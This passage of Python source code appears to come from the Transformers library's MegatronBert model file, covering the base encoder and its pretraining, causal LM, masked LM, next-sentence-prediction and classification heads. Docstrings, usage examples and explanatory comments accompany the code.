            Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
            shape `(batch_size, sequence_length, hidden_size)`.
            Hidden-states of the model at the output of each layer plus the initial embedding outputs.
        attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
            Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
            sequence_length)`.
            Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
            heads.
    """

    loss: Optional[torch.FloatTensor] = None  # summed MLM + NSP loss, only when labels are given
    prediction_logits: torch.FloatTensor = None  # MLM logits, (batch, seq, vocab)
    seq_relationship_logits: torch.FloatTensor = None  # NSP logits, (batch, 2)
    hidden_states: Optional[Tuple[torch.FloatTensor]] = None  # per-layer hidden states, if requested
    attentions: Optional[Tuple[torch.FloatTensor]] = None  # per-layer attention maps, if requested
MEGATRON_BERT_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`MegatronBertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
MEGATRON_BERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
    "The bare MegatronBert Model transformer outputting raw hidden-states without any specific head on top.",
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertModel(MegatronBertPreTrainedModel):
    """
    The model can behave as an encoder (with only self-attention) as well as a decoder, in which case a layer of
    cross-attention is added between the self-attention layers, following the architecture described in [Attention is
    all you need](https://arxiv.org/abs/1706.03762) by Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit,
    Llion Jones, Aidan N. Gomez, Lukasz Kaiser and Illia Polosukhin.
    To behave as an decoder the model needs to be initialized with the `is_decoder` argument of the configuration set
    to `True`. To be used in a Seq2Seq model, the model needs to initialized with both `is_decoder` argument and
    `add_cross_attention` set to `True`; an `encoder_hidden_states` is then expected as an input to the forward pass.
    """
    def __init__(self, config, add_pooling_layer=True):
        # Backbone layout: embeddings -> transformer encoder -> optional pooler.
        # Heads that only consume per-token states pass add_pooling_layer=False.
        super().__init__(config)
        self.config = config
        self.embeddings = MegatronBertEmbeddings(config)
        self.encoder = MegatronBertEncoder(config)
        self.pooler = MegatronBertPooler(config) if add_pooling_layer else None
        # Initialize weights and apply final processing
        self.post_init()
    def get_input_embeddings(self):
        # Token embedding matrix; also the target of input/output embedding tying.
        return self.embeddings.word_embeddings
    def set_input_embeddings(self, value):
        self.embeddings.word_embeddings = value
    def _prune_heads(self, heads_to_prune):
        """
        Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
        class PreTrainedModel
        """
        for layer, heads in heads_to_prune.items():
            self.encoder.layer[layer].attention.prune_heads(heads)
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=BaseModelOutputWithPoolingAndCrossAttentions,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
        use_cache: Optional[bool] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, BaseModelOutputWithPoolingAndCrossAttentions]:
        r"""
        encoder_hidden_states  (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
            Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
            the model is configured as a decoder.
        encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
            the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`:
            - 1 for tokens that are **not masked**,
            - 0 for tokens that are **masked**.
        past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
            Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
            If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
            don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
            `decoder_input_ids` of shape `(batch_size, sequence_length)`.
        use_cache (`bool`, *optional*):
            If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
            `past_key_values`).
        """
        # Resolve output options, falling back to the model configuration.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # KV caching is only meaningful when the model runs as a decoder.
        if self.config.is_decoder:
            use_cache = use_cache if use_cache is not None else self.config.use_cache
        else:
            use_cache = False
        # Exactly one of input_ids / inputs_embeds must be provided.
        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
        elif input_ids is not None:
            input_shape = input_ids.size()
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds")
        batch_size, seq_length = input_shape
        device = input_ids.device if input_ids is not None else inputs_embeds.device
        # past_key_values_length
        past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
        # Default masks: attend to everything (including cached positions), segment 0.
        if attention_mask is None:
            attention_mask = torch.ones(((batch_size, seq_length + past_key_values_length)), device=device)
        if token_type_ids is None:
            token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
        # We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
        # ourselves in which case we just need to make it broadcastable to all heads.
        extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape)
        # If a 2D or 3D attention mask is provided for the cross-attention
        # we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
        if self.config.is_decoder and encoder_hidden_states is not None:
            encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
            encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
            if encoder_attention_mask is None:
                encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
            encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
        else:
            encoder_extended_attention_mask = None
        # Prepare head mask if needed
        # 1.0 in head_mask indicate we keep the head
        # attention_probs has shape bsz x n_heads x N x N
        # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
        # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
        head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
        embedding_output = self.embeddings(
            input_ids=input_ids,
            position_ids=position_ids,
            token_type_ids=token_type_ids,
            inputs_embeds=inputs_embeds,
            past_key_values_length=past_key_values_length,
        )
        encoder_outputs = self.encoder(
            embedding_output,
            attention_mask=extended_attention_mask,
            head_mask=head_mask,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_extended_attention_mask,
            past_key_values=past_key_values,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = encoder_outputs[0]
        pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
        # Tuple output keeps legacy ordering: (sequence_output, pooled_output, *extras).
        if not return_dict:
            return (sequence_output, pooled_output) + encoder_outputs[1:]
        return BaseModelOutputWithPoolingAndCrossAttentions(
            last_hidden_state=sequence_output,
            pooler_output=pooled_output,
            past_key_values=encoder_outputs.past_key_values,
            hidden_states=encoder_outputs.hidden_states,
            attentions=encoder_outputs.attentions,
            cross_attentions=encoder_outputs.cross_attentions,
        )
@add_start_docstrings(
    """
    MegatronBert Model with two heads on top as done during the pretraining: a `masked language modeling` head and a
    `next sentence prediction (classification)` head.
    """,
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForPreTraining(MegatronBertPreTrainedModel):
    # MLM decoder weights may be absent from checkpoints (presumably tied to the
    # input embeddings — confirm against the weight-tying logic of the base class).
    _keys_to_ignore_on_load_missing = ["cls.predictions.decoder"]
    def __init__(self, config, add_binary_head=True):
        super().__init__(config)
        self.bert = MegatronBertModel(config)
        self.cls = MegatronBertPreTrainingHeads(config)
        # Initialize weights and apply final processing
        self.post_init()
    def get_output_embeddings(self):
        # Linear layer projecting hidden states back onto the vocabulary.
        return self.cls.predictions.decoder
    def set_output_embeddings(self, new_embeddings):
        self.cls.predictions.decoder = new_embeddings
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @replace_return_docstrings(output_type=MegatronBertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        next_sentence_label: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, MegatronBertForPreTrainingOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the masked language modeling loss. Indices should be in `[-100, 0, ...,
            config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are ignored (masked), the
            loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`
        next_sentence_label (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair
            (see `input_ids` docstring) Indices should be in `[0, 1]`:
            - 0 indicates sequence B is a continuation of sequence A,
            - 1 indicates sequence B is a random sequence.
        kwargs (`Dict[str, any]`, optional, defaults to *{}*):
            Used to hide legacy arguments that have been deprecated.
        Returns:
        Example:
        ```python
        >>> from transformers import AutoTokenizer, MegatronBertForPreTraining
        >>> import torch
        >>> tokenizer = AutoTokenizer.from_pretrained("nvidia/megatron-bert-cased-345m")
        >>> model = MegatronBertForPreTraining.from_pretrained("nvidia/megatron-bert-cased-345m")
        >>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
        >>> outputs = model(**inputs)
        >>> prediction_logits = outputs.prediction_logits
        >>> seq_relationship_logits = outputs.seq_relationship_logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        # Per-token states feed the MLM head; the pooled [CLS] state feeds the NSP head.
        sequence_output, pooled_output = outputs[:2]
        prediction_scores, seq_relationship_score = self.cls(sequence_output, pooled_output)
        # Loss is only computed when BOTH label sets are supplied:
        # total = MLM cross-entropy + NSP cross-entropy.
        total_loss = None
        if labels is not None and next_sentence_label is not None:
            loss_fct = CrossEntropyLoss()
            masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
            next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
            total_loss = masked_lm_loss + next_sentence_loss
        if not return_dict:
            output = (prediction_scores, seq_relationship_score) + outputs[2:]
            return ((total_loss,) + output) if total_loss is not None else output
        return MegatronBertForPreTrainingOutput(
            loss=total_loss,
            prediction_logits=prediction_scores,
            seq_relationship_logits=seq_relationship_score,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
@add_start_docstrings(
    """MegatronBert Model with a `language modeling` head on top for CLM fine-tuning.""",
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForCausalLM(MegatronBertPreTrainedModel):
    # Pooler is unused (add_pooling_layer=False below); decoder weights may be
    # absent from checkpoints (presumably tied to the input embeddings).
    _keys_to_ignore_on_load_unexpected = [r"pooler"]
    _keys_to_ignore_on_load_missing = [r"position_ids", r"cls.predictions.decoder"]
    def __init__(self, config):
        super().__init__(config)
        if not config.is_decoder:
            logger.warning("If you want to use `MegatronBertForCausalLM` as a standalone, add `is_decoder=True.`")
        self.bert = MegatronBertModel(config, add_pooling_layer=False)
        self.cls = MegatronBertOnlyMLMHead(config)
        # Initialize weights and apply final processing
        self.post_init()
    def get_output_embeddings(self):
        # Linear layer projecting hidden states back onto the vocabulary.
        return self.cls.predictions.decoder
    def set_output_embeddings(self, new_embeddings):
        self.cls.predictions.decoder = new_embeddings
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
        use_cache: Optional[bool] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, CausalLMOutputWithCrossAttentions]:
        r"""
        encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
            Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
            the model is configured as a decoder.
        encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
            the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`:
            - 1 for tokens that are **not masked**,
            - 0 for tokens that are **masked**.
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the left-to-right language modeling loss (next word prediction). Indices should be in
            `[-100, 0, ..., config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are
            ignored (masked), the loss is only computed for the tokens with labels n `[0, ..., config.vocab_size]`
        past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
            Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
            If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
            don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
            `decoder_input_ids` of shape `(batch_size, sequence_length)`.
        use_cache (`bool`, *optional*):
            If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
            `past_key_values`).
        Returns:
        Example:
        ```python
        >>> from transformers import AutoTokenizer, MegatronBertForCausalLM, MegatronBertConfig
        >>> import torch
        >>> tokenizer = AutoTokenizer.from_pretrained("nvidia/megatron-bert-cased-345m")
        >>> model = MegatronBertForCausalLM.from_pretrained("nvidia/megatron-bert-cased-345m", is_decoder=True)
        >>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
        >>> outputs = model(**inputs)
        >>> prediction_logits = outputs.logits
        ```"""
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # Caching is pointless while training with labels.
        if labels is not None:
            use_cache = False
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_attention_mask,
            past_key_values=past_key_values,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = outputs[0]
        prediction_scores = self.cls(sequence_output)
        lm_loss = None
        if labels is not None:
            # we are doing next-token prediction; shift prediction scores and input ids by one
            shifted_prediction_scores = prediction_scores[:, :-1, :].contiguous()
            labels = labels[:, 1:].contiguous()
            loss_fct = CrossEntropyLoss()
            lm_loss = loss_fct(shifted_prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
        if not return_dict:
            output = (prediction_scores,) + outputs[2:]
            return ((lm_loss,) + output) if lm_loss is not None else output
        return CausalLMOutputWithCrossAttentions(
            loss=lm_loss,
            logits=prediction_scores,
            past_key_values=outputs.past_key_values,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
            cross_attentions=outputs.cross_attentions,
        )
    def prepare_inputs_for_generation(self, input_ids, past_key_values=None, attention_mask=None, **model_kwargs):
        """Assemble the model inputs for one generation step.

        When a KV cache is present, only the last token needs to be fed; a full
        attention mask is created on the fly if the caller did not provide one.
        """
        input_shape = input_ids.shape
        # if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
        if attention_mask is None:
            attention_mask = input_ids.new_ones(input_shape)
        # cut decoder_input_ids if past is used
        if past_key_values is not None:
            input_ids = input_ids[:, -1:]
        return {"input_ids": input_ids, "attention_mask": attention_mask, "past_key_values": past_key_values}
    def _reorder_cache(self, past_key_values, beam_idx):
        """Reorder the KV cache to match a new beam order during beam search.

        Fix: `beam_idx` can live on a different device than a layer's cached
        states (e.g. with model parallelism or CPU offload), and
        `index_select` requires the index tensor on the same device — so it is
        moved per state before selecting.
        """
        reordered_past = ()
        for layer_past in past_key_values:
            reordered_past += (
                tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past),
            )
        return reordered_past
@add_start_docstrings("""MegatronBert Model with a `language modeling` head on top.""", MEGATRON_BERT_START_DOCSTRING)
class MegatronBertForMaskedLM(MegatronBertPreTrainedModel):
    # Pooler and NSP head are not used by this head; MLM decoder weights may be
    # absent from checkpoints (presumably tied to the input embeddings).
    _keys_to_ignore_on_load_unexpected = [r"pooler", r"seq_relationship"]
    _keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder"]
    def __init__(self, config):
        super().__init__(config)
        # MLM needs bidirectional attention; warn when the config requests a decoder.
        if config.is_decoder:
            logger.warning(
                "If you want to use `MegatronBertForMaskedLM` make sure `config.is_decoder=False` for "
                "bi-directional self-attention."
            )
        self.bert = MegatronBertModel(config, add_pooling_layer=False)
        self.cls = MegatronBertOnlyMLMHead(config)
        # Initialize weights and apply final processing
        self.post_init()
    def get_output_embeddings(self):
        # Linear layer projecting hidden states back onto the vocabulary.
        return self.cls.predictions.decoder
    def set_output_embeddings(self, new_embeddings):
        self.cls.predictions.decoder = new_embeddings
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=MaskedLMOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        encoder_hidden_states: Optional[torch.FloatTensor] = None,
        encoder_attention_mask: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, MaskedLMOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the masked language modeling loss. Indices should be in `[-100, 0, ...,
            config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are ignored (masked), the
            loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            encoder_hidden_states=encoder_hidden_states,
            encoder_attention_mask=encoder_attention_mask,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = outputs[0]
        prediction_scores = self.cls(sequence_output)
        masked_lm_loss = None
        if labels is not None:
            loss_fct = CrossEntropyLoss()  # -100 index = padding token
            masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
        if not return_dict:
            output = (prediction_scores,) + outputs[2:]
            return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
        return MaskedLMOutput(
            loss=masked_lm_loss,
            logits=prediction_scores,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
    def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
        # Generation with an MLM: append one PAD "dummy" token per sequence so
        # there is always a position to predict. The mask is extended with a 0
        # for that position, so the dummy token itself is not attended to.
        input_shape = input_ids.shape
        effective_batch_size = input_shape[0]
        # add a dummy token
        if self.config.pad_token_id is None:
            raise ValueError("The PAD token should be defined for generation")
        attention_mask = torch.cat([attention_mask, attention_mask.new_zeros((attention_mask.shape[0], 1))], dim=-1)
        dummy_token = torch.full(
            (effective_batch_size, 1), self.config.pad_token_id, dtype=torch.long, device=input_ids.device
        )
        input_ids = torch.cat([input_ids, dummy_token], dim=1)
        return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings(
    """MegatronBert Model with a `next sentence prediction (classification)` head on top.""",
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForNextSentencePrediction(MegatronBertPreTrainedModel):
    # The MLM prediction head is not part of this model and is dropped on load.
    _keys_to_ignore_on_load_unexpected = [r"predictions"]
    def __init__(self, config):
        super().__init__(config)
        self.bert = MegatronBertModel(config)
        self.cls = MegatronBertOnlyNSPHead(config)
        # Initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @replace_return_docstrings(output_type=NextSentencePredictorOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
        **kwargs,
    ) -> Union[Tuple, NextSentencePredictorOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair
            (see `input_ids` docstring). Indices should be in `[0, 1]`:
            - 0 indicates sequence B is a continuation of sequence A,
            - 1 indicates sequence B is a random sequence.
        Returns:
        Example:
        ```python
        >>> from transformers import AutoTokenizer, MegatronBertForNextSentencePrediction
        >>> import torch
        >>> tokenizer = AutoTokenizer.from_pretrained("nvidia/megatron-bert-cased-345m")
        >>> model = MegatronBertForNextSentencePrediction.from_pretrained("nvidia/megatron-bert-cased-345m")
        >>> prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
        >>> next_sentence = "The sky is blue due to the shorter wavelength of blue light."
        >>> encoding = tokenizer(prompt, next_sentence, return_tensors="pt")
        >>> outputs = model(**encoding, labels=torch.LongTensor([1]))
        >>> logits = outputs.logits
        >>> assert logits[0, 0] < logits[0, 1]  # next sentence was random
        ```"""
        # Backward compatibility: the old `next_sentence_label` kwarg is still
        # honored but deprecated in favor of `labels`.
        if "next_sentence_label" in kwargs:
            warnings.warn(
                "The `next_sentence_label` argument is deprecated and will be removed in a future version, use"
                " `labels` instead.",
                FutureWarning,
            )
            labels = kwargs.pop("next_sentence_label")
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        # NSP classifies from the pooled [CLS] representation (2 classes).
        pooled_output = outputs[1]
        seq_relationship_scores = self.cls(pooled_output)
        next_sentence_loss = None
        if labels is not None:
            loss_fct = CrossEntropyLoss()
            next_sentence_loss = loss_fct(seq_relationship_scores.view(-1, 2), labels.view(-1))
        if not return_dict:
            output = (seq_relationship_scores,) + outputs[2:]
            return ((next_sentence_loss,) + output) if next_sentence_loss is not None else output
        return NextSentencePredictorOutput(
            loss=next_sentence_loss,
            logits=seq_relationship_scores,
            hidden_states=outputs.hidden_states,
            attentions=outputs.attentions,
        )
@add_start_docstrings(
    """
    MegatronBert Model transformer with a sequence classification/regression head on top (a linear layer on top of the
    pooled output) e.g. for GLUE tasks.
    """,
    MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForSequenceClassification(MegatronBertPreTrainedModel):
    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.bert = MegatronBertModel(config)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.classifier = nn.Linear(config.hidden_size, config.num_labels)
        # Initialize weights and apply final processing
        self.post_init()
    @add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
    @add_code_sample_docstrings(
        checkpoint=_CHECKPOINT_FOR_DOC,
        output_type=SequenceClassifierOutput,
        config_class=_CONFIG_FOR_DOC,
    )
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.FloatTensor] = None,
        token_type_ids: Optional[torch.LongTensor] = None,
        position_ids: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.FloatTensor] = None,
        inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple, SequenceClassifierOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
            Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
            config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
            `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        outputs = self.bert(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        # Classify from the pooled [CLS] representation.
        pooled_output = outputs[1]
        pooled_output = self.dropout(pooled_output)
